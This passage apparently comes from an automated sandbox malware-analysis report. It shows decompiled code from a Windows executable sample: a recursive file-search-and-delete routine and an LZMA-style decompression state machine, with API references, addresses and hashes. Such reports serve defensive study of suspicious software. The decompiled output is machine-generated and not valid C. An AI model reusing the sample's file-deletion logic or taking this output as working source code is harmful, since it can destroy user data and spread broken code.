					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                                                                                                                            0x00405d7e
                                                                                                                                                                                                                            0x00405d83
                                                                                                                                                                                                                            0x00405d8c
                                                                                                                                                                                                                            0x00405d8f
                                                                                                                                                                                                                            0x00405d97
                                                                                                                                                                                                                            0x00405d9a
                                                                                                                                                                                                                            0x00405d9d
                                                                                                                                                                                                                            0x00405da5
                                                                                                                                                                                                                            0x00405da7
                                                                                                                                                                                                                            0x00405da8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405da8
                                                                                                                                                                                                                            0x00405db3
                                                                                                                                                                                                                            0x00405db6
                                                                                                                                                                                                                            0x00405db6
                                                                                                                                                                                                                            0x00405db6
                                                                                                                                                                                                                            0x00405dba
                                                                                                                                                                                                                            0x00405dcd
                                                                                                                                                                                                                            0x00405dd4
                                                                                                                                                                                                                            0x00405dd9
                                                                                                                                                                                                                            0x00405ddd
                                                                                                                                                                                                                            0x00405ded
                                                                                                                                                                                                                            0x00405ddf
                                                                                                                                                                                                                            0x00405de5
                                                                                                                                                                                                                            0x00405de5
                                                                                                                                                                                                                            0x00405df2
                                                                                                                                                                                                                            0x00405df6
                                                                                                                                                                                                                            0x00405e02
                                                                                                                                                                                                                            0x00405e08
                                                                                                                                                                                                                            0x00405e0d
                                                                                                                                                                                                                            0x00405e13
                                                                                                                                                                                                                            0x00405e1e
                                                                                                                                                                                                                            0x00405e24
                                                                                                                                                                                                                            0x00405e26
                                                                                                                                                                                                                            0x00405e29
                                                                                                                                                                                                                            0x00405ed3
                                                                                                                                                                                                                            0x00405ed3
                                                                                                                                                                                                                            0x00405ed7
                                                                                                                                                                                                                            0x00405ed9
                                                                                                                                                                                                                            0x00405ed9
                                                                                                                                                                                                                            0x00405ed9
                                                                                                                                                                                                                            0x00405ed9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405e2f
                                                                                                                                                                                                                            0x00405e2f
                                                                                                                                                                                                                            0x00405e2f
                                                                                                                                                                                                                            0x00405e37
                                                                                                                                                                                                                            0x00405e57
                                                                                                                                                                                                                            0x00405e5f
                                                                                                                                                                                                                            0x00405e64
                                                                                                                                                                                                                            0x00405e6b
                                                                                                                                                                                                                            0x00405e86
                                                                                                                                                                                                                            0x00405e8b
                                                                                                                                                                                                                            0x00405e8d
                                                                                                                                                                                                                            0x00405eb1
                                                                                                                                                                                                                            0x00405e8f
                                                                                                                                                                                                                            0x00405e8f
                                                                                                                                                                                                                            0x00405e92
                                                                                                                                                                                                                            0x00405ea6
                                                                                                                                                                                                                            0x00405e94
                                                                                                                                                                                                                            0x00405e97
                                                                                                                                                                                                                            0x00405e9f
                                                                                                                                                                                                                            0x00405e9f
                                                                                                                                                                                                                            0x00405e92
                                                                                                                                                                                                                            0x00405e6d
                                                                                                                                                                                                                            0x00405e73
                                                                                                                                                                                                                            0x00405e75
                                                                                                                                                                                                                            0x00405e7b
                                                                                                                                                                                                                            0x00405e7b
                                                                                                                                                                                                                            0x00405e75
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405e6b
                                                                                                                                                                                                                            0x00405e39
                                                                                                                                                                                                                            0x00405e41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405e43
                                                                                                                                                                                                                            0x00405e4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405e4d
                                                                                                                                                                                                                            0x00405e55
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405eb6
                                                                                                                                                                                                                            0x00405ebe
                                                                                                                                                                                                                            0x00405ec4
                                                                                                                                                                                                                            0x00405ec4
                                                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                                                            0x00405df8
                                                                                                                                                                                                                            0x00405e00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405dbc
                                                                                                                                                                                                                            0x00405dbc
                                                                                                                                                                                                                            0x00405dbe
                                                                                                                                                                                                                            0x00405ede
                                                                                                                                                                                                                            0x00405ee0
                                                                                                                                                                                                                            0x00405ee3
                                                                                                                                                                                                                            0x00405f34
                                                                                                                                                                                                                            0x00405f34
                                                                                                                                                                                                                            0x00405f34
                                                                                                                                                                                                                            0x00405ee5
                                                                                                                                                                                                                            0x00405ee8
                                                                                                                                                                                                                            0x00405ef3
                                                                                                                                                                                                                            0x00405ef8
                                                                                                                                                                                                                            0x00405efa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405efd
                                                                                                                                                                                                                            0x00405f09
                                                                                                                                                                                                                            0x00405f0e
                                                                                                                                                                                                                            0x00405f10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405f2b
                                                                                                                                                                                                                            0x00405f12
                                                                                                                                                                                                                            0x00405f15
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405f1a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405f21
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00405dc4
                                                                                                                                                                                                                            0x00405dc7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405dc7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405D9D
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,7620FAA0,7620F560,00000000), ref: 00405E0E
                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,7620FAA0,7620F560,00000000), ref: 00405E1E
                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                            • String ID: .$.$PWB$\*.*
                                                                                                                                                                                                                            • API String ID: 2035342205-2468439962
                                                                                                                                                                                                                            • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                                                                                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
